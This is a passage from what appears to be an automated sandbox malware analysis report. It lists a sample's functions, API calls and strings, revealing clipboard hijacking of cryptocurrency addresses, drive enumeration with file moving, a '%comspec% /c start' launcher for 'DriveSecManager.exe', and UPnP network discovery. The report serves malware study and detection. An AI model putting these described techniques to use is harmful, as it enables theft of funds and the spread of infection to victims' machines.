                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404DDB
                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00404DF2
                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 004053A4
                                                                    • StrStrW.SHLWAPI(00000000,bc1p), ref: 004053C0
                                                                    • StrStrW.SHLWAPI(00000000,bc1q), ref: 004053DC
                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040545F
                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405479
                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00405493
                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 004054AD
                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 004054C7
                                                                    • lstrlenA.KERNEL32(00000000), ref: 004054DC
                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 004054F7
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040550A
                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405528
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                                                    • OpenClipboard.USER32(00000000), ref: 0040553C
                                                                    • EmptyClipboard.USER32 ref: 00405546
                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405552
                                                                    • CloseClipboard.USER32 ref: 00405558
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                    • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$A
                                                                    • API String ID: 2017104846-3944006828
                                                                    • Opcode ID: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                    • Instruction ID: c0db1a85d2b2ab719742c03712a747d69443af7a5f19e9c3a62e09ec18ebafc2
                                                                    • Opcode Fuzzy Hash: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                    • Instruction Fuzzy Hash: E2822A70600218EACB648F45C0945BE7BB2EF82755F60C06BE8496F294D77CDED1EB98
                                                                    Function 00407B20 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID: Y
                                                                    • API String ID: 673498613-3233089245
                                                                    • Opcode ID: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                    • Instruction ID: c2d4c50a35bfe5f8cd224c9e55e2257f54aee963b80b02c573e24d91c8b8cf0b
                                                                    • Opcode Fuzzy Hash: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                    • Instruction Fuzzy Hash: 40D22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80
                                                                    Function 00407B49 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    • Opcode ID: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                    • Instruction ID: bf2a4b6287689beed617d1f95a7506b70f8f7bc33f40ac888a8e51c3a2640481
                                                                    • Opcode Fuzzy Hash: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                    • Instruction Fuzzy Hash: 5FD22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80
                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 609 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 610 4065c5-4065d9 lstrcmpW 609->610 611 40669f-4066a2 609->611 612 4065f1 610->612 613 4065db-4065ef lstrcmpW 610->613 615 40666c-406682 FindNextFileW 612->615 613->612 614 4065f3-40663c wsprintfW * 2 613->614 616 406656-406666 MoveFileExW 614->616 617 40663e-406654 call 406570 614->617 615->610 618 406688-406699 FindClose RemoveDirectoryW 615->618 616->615 617->615 618->611
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                    • wsprintfW.USER32 ref: 00406595
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                    • API String ID: 92872011-32713442
                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 621 405970-405992 GetWindowLongW 622 405994-40599b 621->622 623 4059b6-4059bd 621->623 626 4059a1-4059a5 622->626 627 405a27-405a38 IsClipboardFormatAvailable 622->627 624 4059e6-4059ec 623->624 625 4059bf 623->625 629 405a06-405a0a 624->629 630 4059ee-405a04 SetWindowLongW 624->630 628 405ba4-405bbd DefWindowProcA 625->628 633 4059c4-4059e1 SetClipboardViewer SetWindowLongW 626->633 634 4059a7-4059ab 626->634 631 405a43-405a4d IsClipboardFormatAvailable 627->631 632 405a3a-405a41 627->632 635 405a22 629->635 636 405a0c-405a1c SendMessageA 629->636 630->635 638 405a58-405a62 IsClipboardFormatAvailable 631->638 639 405a4f-405a56 631->639 637 405a6b-405a6f 632->637 633->628 640 4059b1 634->640 641 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 634->641 635->628 636->635 643 405a75-405a7f OpenClipboard 637->643 644 405b3f-405b43 637->644 638->637 642 405a64 638->642 639->637 640->628 641->628 642->637 643->644 647 405a85-405a96 GetClipboardData 643->647 645 405b45-405b55 SendMessageA 644->645 646 405b5b 644->646 645->646 646->628 648 405a98 647->648 649 405a9d-405aae GlobalLock 647->649 648->628 650 405ab0 649->650 651 405ab5-405ac6 649->651 650->628 652 405ac8-405acc 651->652 653 405ae9-405afc call 405690 651->653 654 405afe-405b0e call 4057b0 652->654 655 405ace-405ad2 652->655 661 405b11-405b25 GlobalUnlock CloseClipboard 653->661 654->661 657 405ad4 655->657 658 405ad6-405ae7 call 405570 655->658 657->661 658->661 661->644 664 405b27-405b3c call 404970 call 40a1b0 661->664 664->644
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                    Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                    • API String ID: 1650488544-2117135753
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                    • htons.WS2_32(?), ref: 00402101
                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1603358586-0
                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                    • String ID: 239.255.255.250
                                                                    • API String ID: 726339449-2186272203
                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                    • htons.WS2_32(?), ref: 00401508
                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                    • String ID:
                                                                    • API String ID: 4174406920-0
                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                    • String ID:
                                                                    • API String ID: 107502007-0
                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                    Strings
                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                    • %comspec%, xrefs: 004064BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                    • API String ID: 2038452267-3640840557
                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    Strings
                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
